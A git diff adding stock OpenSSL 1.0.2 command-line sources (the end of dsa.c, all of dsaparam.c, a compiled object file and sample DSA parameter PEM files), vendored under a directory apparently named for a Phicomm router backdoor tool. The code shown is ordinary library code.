+    if (infile == NULL)
+        BIO_set_fp(in, stdin, BIO_NOCLOSE);
+    else {
+        if (BIO_read_filename(in, infile) <= 0) {
+            perror(infile);
+            goto end;
+        }
+    }
+
+    BIO_printf(bio_err, "read DSA key\n");
+
+    {
+        EVP_PKEY *pkey;
+
+        if (pubin)
+            pkey = load_pubkey(bio_err, infile, informat, 1,
+                               passin, e, "Public Key");
+        else
+            pkey = load_key(bio_err, infile, informat, 1,
+                            passin, e, "Private Key");
+
+        if (pkey) {
+            dsa = EVP_PKEY_get1_DSA(pkey);
+            EVP_PKEY_free(pkey);
+        }
+    }
+    if (dsa == NULL) {
+        BIO_printf(bio_err, "unable to load Key\n");
+        ERR_print_errors(bio_err);
+        goto end;
+    }
+
+    if (outfile == NULL) {
+        BIO_set_fp(out, stdout, BIO_NOCLOSE);
+# ifdef OPENSSL_SYS_VMS
+        {
+            BIO *tmpbio = BIO_new(BIO_f_linebuffer());
+            out = BIO_push(tmpbio, out);
+        }
+# endif
+    } else {
+        if (BIO_write_filename(out, outfile) <= 0) {
+            perror(outfile);
+            goto end;
+        }
+    }
+
+    if (text)
+        if (!DSA_print(out, dsa, 0)) {
+            perror(outfile);
+            ERR_print_errors(bio_err);
+            goto end;
+        }
+
+    if (modulus) {
+        fprintf(stdout, "Public Key=");
+        BN_print(out, dsa->pub_key);
+        fprintf(stdout, "\n");
+    }
+
+    if (noout)
+        goto end;
+    BIO_printf(bio_err, "writing DSA key\n");
+    if (outformat == FORMAT_ASN1) {
+        if (pubin || pubout)
+            i = i2d_DSA_PUBKEY_bio(out, dsa);
+        else
+            i = i2d_DSAPrivateKey_bio(out, dsa);
+    } else if (outformat == FORMAT_PEM) {
+        if (pubin || pubout)
+            i = PEM_write_bio_DSA_PUBKEY(out, dsa);
+        else
+            i = PEM_write_bio_DSAPrivateKey(out, dsa, enc,
+                                            NULL, 0, NULL, passout);
+# if !defined(OPENSSL_NO_RSA) && !defined(OPENSSL_NO_RC4)
+    } else if (outformat == FORMAT_MSBLOB || outformat == FORMAT_PVK) {
+        EVP_PKEY *pk;
+        pk = EVP_PKEY_new();
+        EVP_PKEY_set1_DSA(pk, dsa);
+        if (outformat == FORMAT_PVK)
+            i = i2b_PVK_bio(out, pk, pvk_encr, 0, passout);
+        else if (pubin || pubout)
+            i = i2b_PublicKey_bio(out, pk);
+        else
+            i = i2b_PrivateKey_bio(out, pk);
+        EVP_PKEY_free(pk);
+# endif
+    } else {
+        BIO_printf(bio_err, "bad output format specified for outfile\n");
+        goto end;
+    }
+    if (i <= 0) {
+        BIO_printf(bio_err, "unable to write private key\n");
+        ERR_print_errors(bio_err);
+    } else
+        ret = 0;
+ end:
+    if (in != NULL)
+        BIO_free(in);
+    if (out != NULL)
+        BIO_free_all(out);
+    if (dsa != NULL)
+        DSA_free(dsa);
+    if (passin)
+        OPENSSL_free(passin);
+    if (passout)
+        OPENSSL_free(passout);
+    apps_shutdown();
+    OPENSSL_EXIT(ret);
+}
+#else                           /* !OPENSSL_NO_DSA */
+
+# if PEDANTIC
+static void *dummy = &dummy;
+# endif
+
+#endif
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/apps/dsa.o b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/apps/dsa.o
new file mode 100644
index 0000000000000000000000000000000000000000..90518e0a29ff990fd0e1966e5dc518feb9d084b9
GIT binary patch
literal 11624
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
bXY4=pYSX1cx&LM>;=6eJ51<)Ia{PY)M+Mc4

literal 0
HcmV?d00001

diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/apps/dsa1024.pem b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/apps/dsa1024.pem
new file mode 100644
index 0000000..082dec3
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/apps/dsa1024.pem
@@ -0,0 +1,9 @@
+-----BEGIN DSA PARAMETERS-----
+MIIBHgKBgQCnP26Fv0FqKX3wn0cZMJCaCR3aajMexT2GlrMV4FMuj+BZgnOQPnUx
+mUd6UvuF5NmmezibaIqEm4fGHrV+hktTW1nPcWUZiG7OZq5riDb77Cjcwtelu+Us
+OSZL2ppwGJU3lRBWI/YV7boEXt45T/23Qx+1pGVvzYAR5HCVW1DNSQIVAPcHMe36
+bAYD1YWKHKycZedQZmVvAoGATd9MA6aRivUZb1BGJZnlaG8w42nh5bNdmLsohkj8
+3pkEP1+IDJxzJA0gXbkqmj8YlifkYofBe3RiU/xhJ6h6kQmdtvFNnFQPWAbuSXQH
+zlV+I84W9srcWmEBfslxtU323DQph2j2XiCTs9v15AlsQReVkusBtXOlan7YMu0O
+Arg=
+-----END DSA PARAMETERS-----
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/apps/dsa512.pem b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/apps/dsa512.pem
new file mode 100644
index 0000000..5f86d1a
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/apps/dsa512.pem
@@ -0,0 +1,6 @@
+-----BEGIN DSA PARAMETERS-----
+MIGdAkEAnRtpjibb8isRcBmG9hnI+BnyGFOURgbQYlAzSwI8UjADizv5X9EkBk97
+TLqqQJv9luQ3M7stWtdaEUBmonZ9MQIVAPtT71C0QJIxVoZTeuiLIppJ+3GPAkEA
+gz6I5cWJc847bAFJv7PHnwrqRJHlMKrZvltftxDXibeOdPvPKR7rqCxUUbgQ3qDO
+L8wka5B33qJoplISogOdIA==
+-----END DSA PARAMETERS-----
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/apps/dsap.pem b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/apps/dsap.pem
new file mode 100644
index 0000000..d4dfdb3
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/apps/dsap.pem
@@ -0,0 +1,6 @@
+-----BEGIN DSA PARAMETERS-----
+MIGcAkEA+ZiKEvZmc9MtnaFZh4NiZ3oZS4J1PHvPrm9MXj5ntVheDPkdmBDTncya
+GAJcMjwsyB/GvLDGd6yGCw/8eF+09wIVAK3VagOxGd/Q4Af5NbxR5FB7CXEjAkA2
+t/q7HgVLi0KeKvcDG8BRl3wuy7bCvpjgtWiJc/tpvcuzeuAayH89UofjAGueKjXD
+ADiRffvSdhrNw5dkqdql
+-----END DSA PARAMETERS-----
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/apps/dsaparam.c b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/apps/dsaparam.c
new file mode 100644
index 0000000..824a595
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/apps/dsaparam.c
@@ -0,0 +1,469 @@
+/* apps/dsaparam.c */
+/* Copyright (C) 1995-1998 Eric Young (eay@cryptsoft.com)
+ * All rights reserved.
+ *
+ * This package is an SSL implementation written
+ * by Eric Young (eay@cryptsoft.com).
+ * The implementation was written so as to conform with Netscapes SSL.
+ *
+ * This library is free for commercial and non-commercial use as long as
+ * the following conditions are aheared to.  The following conditions
+ * apply to all code found in this distribution, be it the RC4, RSA,
+ * lhash, DES, etc., code; not just the SSL code.  The SSL documentation
+ * included with this distribution is covered by the same copyright terms
+ * except that the holder is Tim Hudson (tjh@cryptsoft.com).
+ *
+ * Copyright remains Eric Young's, and as such any Copyright notices in
+ * the code are not to be removed.
+ * If this package is used in a product, Eric Young should be given attribution
+ * as the author of the parts of the library used.
+ * This can be in the form of a textual message at program startup or
+ * in documentation (online or textual) provided with the package.
+ *
+ * Redistribution and use in source and binary forms, with or without
+ * modification, are permitted provided that the following conditions
+ * are met:
+ * 1. Redistributions of source code must retain the copyright
+ *    notice, this list of conditions and the following disclaimer.
+ * 2. Redistributions in binary form must reproduce the above copyright
+ *    notice, this list of conditions and the following disclaimer in the
+ *    documentation and/or other materials provided with the distribution.
+ * 3. All advertising materials mentioning features or use of this software
+ *    must display the following acknowledgement:
+ *    "This product includes cryptographic software written by
+ *     Eric Young (eay@cryptsoft.com)"
+ *    The word 'cryptographic' can be left out if the rouines from the library
+ *    being used are not cryptographic related :-).
+ * 4. If you include any Windows specific code (or a derivative thereof) from
+ *    the apps directory (application code) you must include an acknowledgement:
+ *    "This product includes software written by Tim Hudson (tjh@cryptsoft.com)"
+ *
+ * THIS SOFTWARE IS PROVIDED BY ERIC YOUNG ``AS IS'' AND
+ * ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
+ * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
+ * ARE DISCLAIMED.  IN NO EVENT SHALL THE AUTHOR OR CONTRIBUTORS BE LIABLE
+ * FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL
+ * DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS
+ * OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION)
+ * HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT
+ * LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY
+ * OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF
+ * SUCH DAMAGE.
+ *
+ * The licence and distribution terms for any publically available version or
+ * derivative of this code cannot be changed.  i.e. this code cannot simply be
+ * copied and put under another distribution licence
+ * [including the GNU Public Licence.]
+ */
+
+#include <openssl/opensslconf.h> /* for OPENSSL_NO_DSA */
+/*
+ * Until the key-gen callbacks are modified to use newer prototypes, we allow
+ * deprecated functions for openssl-internal code
+ */
+#ifdef OPENSSL_NO_DEPRECATED
+# undef OPENSSL_NO_DEPRECATED
+#endif
+
+#ifndef OPENSSL_NO_DSA
+# include <assert.h>
+# include <stdio.h>
+# include <stdlib.h>
+# include <time.h>
+# include <string.h>
+# include "apps.h"
+# include <openssl/bio.h>
+# include <openssl/err.h>
+# include <openssl/bn.h>
+# include <openssl/dsa.h>
+# include <openssl/x509.h>
+# include <openssl/pem.h>
+
+# undef PROG
+# define PROG    dsaparam_main
+
+/*-
+ * -inform arg  - input format - default PEM (DER or PEM)
+ * -outform arg - output format - default PEM
+ * -in arg      - input file - default stdin
+ * -out arg     - output file - default stdout
+ * -noout
+ * -text
+ * -C
+ * -noout
+ * -genkey
+ *  #ifdef GENCB_TEST
+ * -timebomb n  - interrupt keygen after <n> seconds
+ *  #endif
+ */
+
+# ifdef GENCB_TEST
+
+static int stop_keygen_flag = 0;
+
+static void timebomb_sigalarm(int foo)
+{
+    stop_keygen_flag = 1;
+}
+
+# endif
+
+static int MS_CALLBACK dsa_cb(int p, int n, BN_GENCB *cb);
+
+int MAIN(int, char **);
+
+int MAIN(int argc, char **argv)
+{
+    DSA *dsa = NULL;
+    int i, badops = 0, text = 0;
+    BIO *in = NULL, *out = NULL;
+    int informat, outformat, noout = 0, C = 0, ret = 1;
+    char *infile, *outfile, *prog, *inrand = NULL;
+    int numbits = -1, num, genkey = 0;
+    int need_rand = 0;
+# ifndef OPENSSL_NO_ENGINE
+    char *engine = NULL;
+# endif
+# ifdef GENCB_TEST
+    int timebomb = 0;
+# endif
+
+    apps_startup();
+
+    if (bio_err == NULL)
+        if ((bio_err = BIO_new(BIO_s_file())) != NULL)
+            BIO_set_fp(bio_err, stderr, BIO_NOCLOSE | BIO_FP_TEXT);
+
+    if (!load_config(bio_err, NULL))
+        goto end;
+
+    infile = NULL;
+    outfile = NULL;
+    informat = FORMAT_PEM;
+    outformat = FORMAT_PEM;
+
+    prog = argv[0];
+    argc--;
+    argv++;
+    while (argc >= 1) {
+        if (strcmp(*argv, "-inform") == 0) {
+            if (--argc < 1)
+                goto bad;
+            informat = str2fmt(*(++argv));
+        } else if (strcmp(*argv, "-outform") == 0) {
+            if (--argc < 1)
+                goto bad;
+            outformat = str2fmt(*(++argv));
+        } else if (strcmp(*argv, "-in") == 0) {
+            if (--argc < 1)
+                goto bad;
+            infile = *(++argv);
+        } else if (strcmp(*argv, "-out") == 0) {
+            if (--argc < 1)
+                goto bad;
+            outfile = *(++argv);
+        }
+# ifndef OPENSSL_NO_ENGINE
+        else if (strcmp(*argv, "-engine") == 0) {
+            if (--argc < 1)
+                goto bad;
+            engine = *(++argv);
+        }
+# endif
+# ifdef GENCB_TEST
+        else if (strcmp(*argv, "-timebomb") == 0) {
+            if (--argc < 1)
+                goto bad;
+            timebomb = atoi(*(++argv));
+        }
+# endif
+        else if (strcmp(*argv, "-text") == 0)
+            text = 1;
+        else if (strcmp(*argv, "-C") == 0)
+            C = 1;
+        else if (strcmp(*argv, "-genkey") == 0) {
+            genkey = 1;
+            need_rand = 1;
+        } else if (strcmp(*argv, "-rand") == 0) {
+            if (--argc < 1)
+                goto bad;
+            inrand = *(++argv);
+            need_rand = 1;
+        } else if (strcmp(*argv, "-noout") == 0)
+            noout = 1;
+        else if (sscanf(*argv, "%d", &num) == 1) {
+            /* generate a key */
+            numbits = num;
+            need_rand = 1;
+        } else {
+            BIO_printf(bio_err, "unknown option %s\n", *argv);
+            badops = 1;
+            break;
+        }
+        argc--;
+        argv++;
+    }
+
+    if (badops) {
+ bad:
+        BIO_printf(bio_err, "%s [options] [bits] <infile >outfile\n", prog);
+        BIO_printf(bio_err, "where options are\n");
+        BIO_printf(bio_err, " -inform arg   input format - DER or PEM\n");
+        BIO_printf(bio_err, " -outform arg  output format - DER or PEM\n");
+        BIO_printf(bio_err, " -in arg       input file\n");
+        BIO_printf(bio_err, " -out arg      output file\n");
+        BIO_printf(bio_err, " -text         print as text\n");
+        BIO_printf(bio_err, " -C            Output C code\n");
+        BIO_printf(bio_err, " -noout        no output\n");
+        BIO_printf(bio_err, " -genkey       generate a DSA key\n");
+        BIO_printf(bio_err,
+                   " -rand         files to use for random number input\n");
+# ifndef OPENSSL_NO_ENGINE
+        BIO_printf(bio_err,
+                   " -engine e     use engine e, possibly a hardware device.\n");
+# endif
+# ifdef GENCB_TEST
+        BIO_printf(bio_err,
+                   " -timebomb n   interrupt keygen after <n> seconds\n");
+# endif
+        BIO_printf(bio_err,
+                   " number        number of bits to use for generating private key\n");
+        goto end;
+    }
+
+    ERR_load_crypto_strings();
+
+    in = BIO_new(BIO_s_file());
+    out = BIO_new(BIO_s_file());
+    if ((in == NULL) || (out == NULL)) {
+        ERR_print_errors(bio_err);
+        goto end;
+    }
+
+    if (infile == NULL)
+        BIO_set_fp(in, stdin, BIO_NOCLOSE);
+    else {
+        if (BIO_read_filename(in, infile) <= 0) {
+            perror(infile);
+            goto end;
+        }
+    }
+    if (outfile == NULL) {
+        BIO_set_fp(out, stdout, BIO_NOCLOSE);
+# ifdef OPENSSL_SYS_VMS
+        {
+            BIO *tmpbio = BIO_new(BIO_f_linebuffer());
+            out = BIO_push(tmpbio, out);
+        }
+# endif
+    } else {
+        if (BIO_write_filename(out, outfile) <= 0) {
+            perror(outfile);
+            goto end;
+        }
+    }
+
+# ifndef OPENSSL_NO_ENGINE
+    setup_engine(bio_err, engine, 0);
+# endif
+
+    if (need_rand) {
+        app_RAND_load_file(NULL, bio_err, (inrand != NULL));
+        if (inrand != NULL)
+            BIO_printf(bio_err, "%ld semi-random bytes loaded\n",
+                       app_RAND_load_files(inrand));
+    }
+
+    if (numbits > 0) {
+        BN_GENCB cb;
+        BN_GENCB_set(&cb, dsa_cb, bio_err);
+        assert(need_rand);
+        dsa = DSA_new();
+        if (!dsa) {
+            BIO_printf(bio_err, "Error allocating DSA object\n");
+            goto end;
+        }
+        BIO_printf(bio_err, "Generating DSA parameters, %d bit long prime\n",
+                   num);
+        BIO_printf(bio_err, "This could take some time\n");
+# ifdef GENCB_TEST
+        if (timebomb > 0) {
+            struct sigaction act;
+            act.sa_handler = timebomb_sigalarm;
+            act.sa_flags = 0;
+            BIO_printf(bio_err,
+                       "(though I'll stop it if not done within %d secs)\n",
+                       timebomb);
+            if (sigaction(SIGALRM, &act, NULL) != 0) {
+                BIO_printf(bio_err, "Error, couldn't set SIGALRM handler\n");
+                goto end;
+            }
+            alarm(timebomb);
+        }
+# endif
+        if (!DSA_generate_parameters_ex(dsa, num, NULL, 0, NULL, NULL, &cb)) {
+# ifdef GENCB_TEST
+            if (stop_keygen_flag) {
+                BIO_printf(bio_err, "DSA key generation time-stopped\n");
+                /* This is an asked-for behaviour! */
+                ret = 0;
+                goto end;
+            }
+# endif
+            ERR_print_errors(bio_err);
+            BIO_printf(bio_err, "Error, DSA key generation failed\n");
+            goto end;
+        }
+    } else if (informat == FORMAT_ASN1)
+        dsa = d2i_DSAparams_bio(in, NULL);
+    else if (informat == FORMAT_PEM)
+        dsa = PEM_read_bio_DSAparams(in, NULL, NULL, NULL);
+    else {
+        BIO_printf(bio_err, "bad input format specified\n");
+        goto end;
+    }
+    if (dsa == NULL) {
+        BIO_printf(bio_err, "unable to load DSA parameters\n");
+        ERR_print_errors(bio_err);
+        goto end;
+    }
+
+    if (text) {
+        DSAparams_print(out, dsa);
+    }
+
+    if (C) {
+        unsigned char *data;
+        int l, len, bits_p;
+
+        len = BN_num_bytes(dsa->p);
+        bits_p = BN_num_bits(dsa->p);
+        data = (unsigned char *)OPENSSL_malloc(len + 20);
+        if (data == NULL) {
+            perror("OPENSSL_malloc");
+            goto end;
+        }
+        l = BN_bn2bin(dsa->p, data);
+        printf("static unsigned char dsa%d_p[]={", bits_p);
+        for (i = 0; i < l; i++) {
+            if ((i % 12) == 0)
+                printf("\n\t");
+            printf("0x%02X,", data[i]);
+        }
+        printf("\n\t};\n");
+
+        l = BN_bn2bin(dsa->q, data);
+        printf("static unsigned char dsa%d_q[]={", bits_p);
+        for (i = 0; i < l; i++) {
+            if ((i % 12) == 0)
+                printf("\n\t");
+            printf("0x%02X,", data[i]);
+        }
+        printf("\n\t};\n");
+
+        l = BN_bn2bin(dsa->g, data);
+        printf("static unsigned char dsa%d_g[]={", bits_p);
+        for (i = 0; i < l; i++) {
+            if ((i % 12) == 0)
+                printf("\n\t");
+            printf("0x%02X,", data[i]);
+        }
+        printf("\n\t};\n\n");
+
+        printf("DSA *get_dsa%d()\n\t{\n", bits_p);
+        printf("\tDSA *dsa;\n\n");
+        printf("\tif ((dsa=DSA_new()) == NULL) return(NULL);\n");
+        printf("\tdsa->p=BN_bin2bn(dsa%d_p,sizeof(dsa%d_p),NULL);\n",
+               bits_p, bits_p);
+        printf("\tdsa->q=BN_bin2bn(dsa%d_q,sizeof(dsa%d_q),NULL);\n",
+               bits_p, bits_p);
+        printf("\tdsa->g=BN_bin2bn(dsa%d_g,sizeof(dsa%d_g),NULL);\n",
+               bits_p, bits_p);
+        printf
+            ("\tif ((dsa->p == NULL) || (dsa->q == NULL) || (dsa->g == NULL))\n");
+        printf("\t\t{ DSA_free(dsa); return(NULL); }\n");
+        printf("\treturn(dsa);\n\t}\n");
+    }
+
+    if (!noout) {
+        if (outformat == FORMAT_ASN1)
+            i = i2d_DSAparams_bio(out, dsa);
+        else if (outformat == FORMAT_PEM)
+            i = PEM_write_bio_DSAparams(out, dsa);
+        else {
+            BIO_printf(bio_err, "bad output format specified for outfile\n");
+            goto end;
+        }
+        if (!i) {
+            BIO_printf(bio_err, "unable to write DSA parameters\n");
+            ERR_print_errors(bio_err);
+            goto end;
+        }
+    }
+    if (genkey) {
+        DSA *dsakey;
+
+        assert(need_rand);
+        if ((dsakey = DSAparams_dup(dsa)) == NULL)
+            goto end;
+        if (!DSA_generate_key(dsakey)) {
+            ERR_print_errors(bio_err);
+            DSA_free(dsakey);
+            goto end;
+        }
+        if (outformat == FORMAT_ASN1)
+            i = i2d_DSAPrivateKey_bio(out, dsakey);
+        else if (outformat == FORMAT_PEM)
+            i = PEM_write_bio_DSAPrivateKey(out, dsakey, NULL, NULL, 0, NULL,
+                                            NULL);
+        else {
+            BIO_printf(bio_err, "bad output format specified for outfile\n");
+            DSA_free(dsakey);
+            goto end;
+        }
+        DSA_free(dsakey);
+    }
+    if (need_rand)
+        app_RAND_write_file(NULL, bio_err);
+    ret = 0;
+ end:
+    if (in != NULL)
+        BIO_free(in);
+    if (out != NULL)
+        BIO_free_all(out);
+    if (dsa != NULL)
+        DSA_free(dsa);
+    apps_shutdown();
+    OPENSSL_EXIT(ret);
+}
+
